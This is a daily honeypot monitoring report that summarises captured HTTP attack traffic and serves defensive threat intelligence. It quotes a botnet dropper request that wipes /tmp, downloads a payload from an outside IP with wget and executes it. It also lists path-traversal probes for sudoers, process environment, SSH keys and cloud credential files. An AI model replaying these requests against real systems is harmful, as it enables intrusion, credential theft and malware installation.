Table of Contents

Daily Report: 2025-08-24
#

Executive summary
#

interaction report on http service of various Hhoneypot around the world.

Executive summary
OT report simplified
Botnet dropper behaviour
List of request
List of country_iso_code

executive_summary
#

In today’s repport, we detected 1 stage 1 IP address(es), linked to 1 dropper URL(s).

There are 150 new requests that have never been observed before (these were added to the monitored request database.).

A total of 3236 requests were recorded during the day, originating from 1 different countries, with a peak of 2846 requests coming from GB.

ot_simplified_report
#

simplified report for medium-level interactions with honeypots that mimic industrial systems (web site loading, or interactions with the website), for more contact us on social@shoggoth.industries.

source_country	targeted_country
GB	Germany
GB	Germany
US	Germany
US	Germany
BR	Germany
GB	Germany

botnet_dropper_behaviour
#

remote_addr	request
8.219.240.83	GET /shell?cd+/tmp;rm+-rf+*;wget+196.251.86.86/jaws;sh+/tmp/jaws HTTP/1.1

request
#

The list of requests presented here are those that have not yet been yet integrated into the request database.

	number_of_occurence	request
6	8	SSH-2.0-libssh_0.11.2
199	2	POST /boafrm/formWsc HTTP/1.1
268	2	POST /goform/Mail_Test HTTP/1.1
489	1	GET /config/keys.js HTTP/1.1
490	1	GET /config/db.js HTTP/1.1
494	1	GET /config/database.py HTTP/1.1
509	1	GET /config/application-prod.properties HTTP/1.1
512	1	GET /config/application-dev.properties HTTP/1.1
575	1	GET /src/config/settings.js HTTP/1.1
576	1	GET /app/code/local.xml HTTP/1.1
613	1	GET /src/config/config.ts HTTP/1.1
633	1	GET /gatsby-browser.js HTTP/1.1
634	1	GET /config/test.py HTTP/1.1
635	1	GET /gatsby-ssr.js HTTP/1.1
636	1	GET /config/settings.js HTTP/1.1
637	1	GET /config/environment.js HTTP/1.1
640	1	GET /config/packages/dev/twig.yaml HTTP/1.1
642	1	GET /config/packages/test/security.yaml HTTP/1.1
643	1	GET /config/routes/dev/twig.yaml HTTP/1.1
644	1	GET /config/dev.env.js HTTP/1.1
645	1	GET /config/secrets.py HTTP/1.1
646	1	GET /config/prod.env.js HTTP/1.1
648	1	GET /config/staging.env.js HTTP/1.1
649	1	GET /src/configuration.js HTTP/1.1
653	1	GET /server/settings.js HTTP/1.1
654	1	GET /server/environment.js HTTP/1.1
656	1	GET /config/test.env.js HTTP/1.1
659	1	GET /conf/development.conf HTTP/1.1
660	1	GET /conf/production.conf HTTP/1.1
661	1	GET /conf/test.conf HTTP/1.1
663	1	GET /conf/application.properties HTTP/1.1
664	1	GET /config/connections.js HTTP/1.1
666	1	GET /src/config/configuration.js HTTP/1.1
673	1	GET /conf/application.yaml HTTP/1.1
674	1	GET /config/routes.rb HTTP/1.1
679	1	GET /config/database.go HTTP/1.1
680	1	GET /config/env.go HTTP/1.1
683	1	GET /config/production.py HTTP/1.1
684	1	GET /config/development.py HTTP/1.1
763	1	GET /src/main/resources/security.properties HTTP/1.1
764	1	GET /src/main/resources/database.properties HTTP/1.1
782	1	GET /src/config/settings.ts HTTP/1.1
786	1	GET /src/config/app.config.ts HTTP/1.1
791	1	GET /src/environments/environment.staging.ts HTTP/1.1
814	1	GET /config/application-test.properties HTTP/1.1
965	1	GET /.mailgun/private_keys.json HTTP/1.1
966	1	GET /config/secrets/aws_keys.json HTTP/1.1
967	1	GET /config/secrets/gcp_keys.json HTTP/1.1
968	1	GET /config/secrets/sendgrid.json HTTP/1.1
969	1	GET /config/secrets/sendinblue.json HTTP/1.1
970	1	GET /config/secrets/mailgun.json HTTP/1.1
971	1	GET /config/private/aws_keys.json HTTP/1.1
973	1	GET /config/private/sendgrid.json HTTP/1.1
974	1	GET /config/private/sendinblue.json HTTP/1.1
975	1	GET /config/private/mailgun.json HTTP/1.1
981	1	GET /config/private/gcp_keys.json HTTP/1.1
983	1	GET /../../../../etc/sudoers HTTP/1.1
984	1	GET /../../../../proc/self/environ HTTP/1.1
985	1	GET /../../../../proc/self/mounts HTTP/1.1
986	1	GET /../../../../var/log/secure HTTP/1.1
987	1	GET /../../../../var/log/messages HTTP/1.1
988	1	GET /../../../../var/log/nginx/error.log HTTP/1.1
989	1	GET /.sendinblue/api_keys.json HTTP/1.1
990	1	GET /../../../../var/log/mysql/mysql.log HTTP/1.1
991	1	GET /../../../../home/*/.ssh/id_rsa HTTP/1.1
992	1	GET /../../../../home/*/.aws/credentials HTTP/1.1
993	1	GET /../../../../home/*/.sendgrid/keys.json HTTP/1.1
994	1	GET /../../../../home/*/.mailgun/private_keys.json HTTP/1.1
995	1	GET /.gcp/service_account_keys.json HTTP/1.1
996	1	GET /.gcp/project_tokens.json HTTP/1.1
997	1	GET /.sendgrid/keys.json HTTP/1.1
998	1	GET /../../../../var/log/apache2/error.log HTTP/1.1
1020	1	POST /cgi-bin/ViewLog.asp HTTP/1.1
1028	1	\x00\x0E8\xCD\xD3\x9C\xF3\x8C\x05\xBC\x1A\x00\x00\x00\x00\x00
1029	1	POST /goform/setPingInfo HTTP/1.1
1032	1	POST /goform/mp HTTP/1.1
1973	1	GET /resources/application.conf HTTP/1.1
2068	1	GET /src/setupTests.js HTTP/1.1
2069	1	GET /src/constants.js HTTP/1.1
2071	1	GET /config-overrides.js HTTP/1.1
2073	1	GET /src/env.js HTTP/1.1
2074	1	GET /src/config/index.js HTTP/1.1
2076	1	GET /config/packages/prod.yaml HTTP/1.1
2077	1	GET /config/packages/dev.yaml HTTP/1.1
2078	1	GET /config/packages/test.yaml HTTP/1.1
2079	1	GET /config/routes.yaml HTTP/1.1
2080	1	GET /config/packages/security.yaml HTTP/1.1
2081	1	GET /config/packages/doctrine.yaml HTTP/1.1
2082	1	GET /config/packages/twig.yaml HTTP/1.1
2083	1	GET /config/packages/framework.yaml HTTP/1.1
2085	1	GET /src/main/resources/application-context.xml HTTP/1.1
2088	1	GET /src/environments/environment.dev.ts HTTP/1.1
2089	1	GET /src/environments/environment.test.ts HTTP/1.1
2092	1	GET /src/setupProxy.js HTTP/1.1
2099	1	GET /src/config/env.js HTTP/1.1
2102	1	GET /conf/application-prod.conf HTTP/1.1
2103	1	GET /conf/application-test.conf HTTP/1.1
2104	1	GET /conf/dev-application.conf HTTP/1.1
2105	1	GET /conf/prod-application.conf HTTP/1.1
2109	1	GET /config/packages/cache.yaml HTTP/1.1
2110	1	GET /client/config.js HTTP/1.1
2118	1	GET /server/env.js HTTP/1.1
2121	1	GET /config/env/development.js HTTP/1.1
2123	1	GET /config/env/test.js HTTP/1.1
2124	1	GET /config/bootstrap.js HTTP/1.1
2125	1	GET /config/models.js HTTP/1.1
2126	1	GET /config/policies.js HTTP/1.1
2127	1	GET /conf/application-dev.conf HTTP/1.1
2128	1	GET /config/session.js HTTP/1.1
2129	1	GET /config/sockets.js HTTP/1.1
2130	1	GET /config/views.js HTTP/1.1
2131	1	GET /conf/application.conf HTTP/1.1
2132	1	GET /conf/routes HTTP/1.1
2133	1	GET /conf/logback.xml HTTP/1.1
2134	1	GET /conf/messages HTTP/1.1
2135	1	GET /conf/play.plugins HTTP/1.1
2136	1	GET /config/routes.js HTTP/1.1
2137	1	GET /?xdebuginfo HTTP/1.1
2138	1	GET /Node.js/JavaScript HTTP/1.1
2143	1	GET /config/dev_config.py HTTP/1.1
2144	1	GET /src/main/resources/log4j2.xml HTTP/1.1
2145	1	GET /config/test_config.py HTTP/1.1
2146	1	GET /development.py HTTP/1.1
2149	1	GET /config/application.rb HTTP/1.1
2152	1	GET /config/initializers/devise.rb HTTP/1.1
2153	1	GET /config/prod_config.py HTTP/1.1
2158	1	GET /staticfiles HTTP/1.1
2161	1	GET /src/main/resources/appsettings.yml HTTP/1.1
2164	1	GET /src/main/resources/application.properties HTTP/1.1
2169	1	GET /device/device.js HTTP/1.1
2172	1	GET /config/settings/base.py HTTP/1.1
2173	1	GET /config/settings/local.py HTTP/1.1
2179	1	GET /config/initializers/sidekiq.rb HTTP/1.1
2182	1	GET /src/main/resources/bootstrap.yml HTTP/1.1
2183	1	GET /src/main/resources/bootstrap.properties HTTP/1.1
2184	1	GET /src/main/resources/application-dev.yml HTTP/1.1
2185	1	GET /src/main/resources/application-prod.yml HTTP/1.1
2186	1	GET /src/main/resources/application-test.yml HTTP/1.1
2187	1	GET /src/main/resources/logback-spring.xml HTTP/1.1
2189	1	GET /config/cable.yml HTTP/1.1
2190	1	GET /config/puma.rb HTTP/1.1
2195	1	GET /web.Release.config HTTP/1.1
2196	1	GET /web.Debug.config HTTP/1.1
2197	1	GET /config/settings/init.py HTTP/1.1
2200	1	GET /config/dev_settings.py HTTP/1.1
2201	1	GET /config/prod_settings.py HTTP/1.1
2202	1	GET /config/test_settings.py HTTP/1.1
2203	1	GET /config/asgi.py HTTP/1.1
2204	1	GET /config/wsgi.py HTTP/1.1
2205	1	GET /config/urls.py HTTP/1.1